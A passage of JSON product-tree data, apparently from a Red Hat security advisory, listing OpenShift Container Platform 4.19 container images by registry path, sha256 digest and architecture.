"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64"
},
